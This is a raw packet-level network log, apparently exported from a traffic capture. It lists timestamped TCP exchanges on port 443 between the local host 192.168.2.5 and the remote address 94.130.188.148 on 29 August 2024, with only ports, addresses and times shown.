                                                                                      Aug 29, 2024 20:49:48.590765953 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:48.590835094 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:48.590845108 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:48.590882063 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:48.596740007 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:48.596755028 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:48.596805096 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:48.596812963 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:48.596848965 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:48.607912064 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:48.607927084 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.147416115 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.147429943 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.147474051 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.147481918 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.147509098 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.183760881 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.183775902 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.183866024 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.183900118 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.183936119 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.208818913 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.208833933 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.208935976 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.208950043 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.208987951 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.211812019 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.211826086 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.211883068 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.211889982 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.211922884 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.213193893 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.213208914 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.213265896 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.213273048 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.213305950 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.215776920 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.215794086 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.215848923 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.215856075 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.215886116 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.219283104 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.219296932 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.219360113 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.219367027 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.219397068 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.239917994 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.239933014 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.239985943 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.239994049 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.240027905 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.240940094 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.240953922 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.241013050 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.241020918 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.241055012 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.274935961 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.274955988 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.275016069 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.275026083 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.275063992 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.299935102 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.299949884 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.300112963 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.300122023 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.300165892 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.303040981 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.303056002 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.303111076 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.303118944 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.303153038 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.304313898 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.304332972 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.304383039 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.304390907 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.304421902 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.306955099 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.306969881 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.307023048 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.307029963 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.307061911 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.310570002 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.310584068 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.310636997 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.310643911 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.310678005 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.331166983 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.331182003 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.331270933 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.331285000 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.331331968 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.332396984 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.332412958 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.332470894 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.332479000 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.332518101 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.382230043 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.382245064 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.382294893 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.382318020 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.382332087 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.382354975 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.417144060 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.417164087 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.417227030 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.417253017 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.417296886 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.418450117 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.418463945 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.418512106 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.418520927 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.418557882 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.419668913 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.419692993 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.419723988 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.419732094 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.419749975 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.419764996 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.420428991 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.420442104 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.420492887 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.420510054 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.420527935 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.420547962 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.422024012 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.422040939 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.422085047 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.422099113 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.422117949 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.422131062 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.436917067 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.436929941 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.436980009 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.436994076 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.437005043 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.437027931 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.438064098 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.438077927 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.438126087 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.438133001 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.438169956 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.486776114 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.486790895 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.486839056 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.486849070 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.486874104 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.486886978 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.521795988 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.521810055 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.521878004 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.521895885 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.521935940 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.522936106 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.522954941 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.522994041 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.523001909 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.523019075 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.523034096 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.523850918 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.523865938 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.523900032 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.523907900 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.523926020 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.523945093 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.524754047 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.524777889 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.524800062 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.524806976 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.524823904 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.524841070 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.525521994 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.525536060 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.525585890 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.525593042 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.525626898 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.538891077 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.538903952 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.539000034 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.539033890 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.539084911 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.539436102 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.539490938 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.539494991 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.539505005 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.539515972 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:49.539556026 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.539576054 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.572834969 CEST59953443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:49.572885990 CEST4435995394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:50.483685970 CEST59954443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:50.483731031 CEST4435995494.130.188.148192.168.2.5
Aug 29, 2024 20:49:50.483803034 CEST | 59954 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:50.484019041 CEST | 59954 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:50.484034061 CEST | 443 | 59954 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:51.408819914 CEST | 443 | 59954 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:51.411351919 CEST | 59954 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:51.411837101 CEST | 59954 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:51.411849976 CEST | 443 | 59954 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:51.413621902 CEST | 59954 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:51.413631916 CEST | 443 | 59954 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:51.413656950 CEST | 59954 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:51.413662910 CEST | 443 | 59954 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:51.710125923 CEST | 59955 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:51.710174084 CEST | 443 | 59955 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:51.710247040 CEST | 59955 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:51.710510969 CEST | 59955 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:51.710525036 CEST | 443 | 59955 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:52.147694111 CEST | 443 | 59954 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:52.147758961 CEST | 443 | 59954 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:52.147770882 CEST | 59954 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:52.147825003 CEST | 59954 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:52.148682117 CEST | 59954 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:52.148706913 CEST | 443 | 59954 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:52.374152899 CEST | 443 | 59955 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:52.374206066 CEST | 59955 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:52.374680996 CEST | 59955 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:52.374691963 CEST | 443 | 59955 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:52.376497984 CEST | 59955 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:52.376502991 CEST | 443 | 59955 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:53.057456017 CEST | 443 | 59955 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:53.057482004 CEST | 443 | 59955 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:53.057543039 CEST | 443 | 59955 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:53.057677031 CEST | 59955 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:53.058131933 CEST | 59955 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:53.058151007 CEST | 443 | 59955 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:53.060708046 CEST | 59956 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:53.060746908 CEST | 443 | 59956 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:53.060817957 CEST | 59956 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:53.061044931 CEST | 59956 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:53.061059952 CEST | 443 | 59956 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:53.730272055 CEST | 443 | 59956 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:53.730355978 CEST | 59956 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:53.730993986 CEST | 59956 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:53.731004000 CEST | 443 | 59956 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:53.732580900 CEST | 59956 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:53.732587099 CEST | 443 | 59956 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:54.440737009 CEST | 443 | 59956 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:54.440798998 CEST | 59956 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:54.440810919 CEST | 443 | 59956 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:54.440820932 CEST | 443 | 59956 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:54.440850019 CEST | 59956 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:54.440872908 CEST | 59956 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:54.441097021 CEST | 59956 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:54.441109896 CEST | 443 | 59956 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:54.442394018 CEST | 59957 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:54.442430019 CEST | 443 | 59957 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:54.442509890 CEST | 59957 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:54.442727089 CEST | 59957 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:54.442740917 CEST | 443 | 59957 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:55.420093060 CEST | 443 | 59957 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:55.420274019 CEST | 59957 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:55.420852900 CEST | 59957 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:55.420865059 CEST | 443 | 59957 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:55.422390938 CEST | 59957 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:55.422396898 CEST | 443 | 59957 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:56.132848024 CEST | 443 | 59957 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:56.132867098 CEST | 443 | 59957 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:56.132919073 CEST | 443 | 59957 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:56.132949114 CEST | 59957 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:56.132997036 CEST | 59957 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:56.133306026 CEST | 59957 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:56.133322001 CEST | 443 | 59957 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:56.154145956 CEST | 59958 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:56.154176950 CEST | 443 | 59958 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:56.154251099 CEST | 59958 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:56.154474020 CEST | 59958 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:56.154485941 CEST | 443 | 59958 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:56.817787886 CEST | 443 | 59958 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:56.817976952 CEST | 59958 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:56.818264008 CEST | 59958 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:56.818275928 CEST | 443 | 59958 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:56.827039003 CEST | 59958 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:56.827044010 CEST | 443 | 59958 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:57.521780968 CEST | 443 | 59958 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:57.521840096 CEST | 443 | 59958 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:57.521847963 CEST | 59958 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:57.521887064 CEST | 59958 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:57.522860050 CEST | 59958 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:57.522883892 CEST | 443 | 59958 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:58.228876114 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:58.228909969 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:58.229006052 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:58.229228020 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:58.229242086 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:58.900382042 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:58.900576115 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:58.901006937 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:58.901012897 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:58.902684927 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:58.902689934 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:58.902781963 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:58.902801037 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:58.902806044 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:58.902811050 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:58.902882099 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:58.902895927 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:58.902901888 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:58.902909040 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:58.903126001 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:58.903153896 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:49:58.907830000 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:49:58.907847881 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:50:00.202039003 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:50:00.202105045 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
Aug 29, 2024 20:50:00.202111959 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:50:00.202157974 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:50:00.202368975 CEST | 59959 | 443 | 192.168.2.5 | 94.130.188.148
Aug 29, 2024 20:50:00.202395916 CEST | 443 | 59959 | 94.130.188.148 | 192.168.2.5
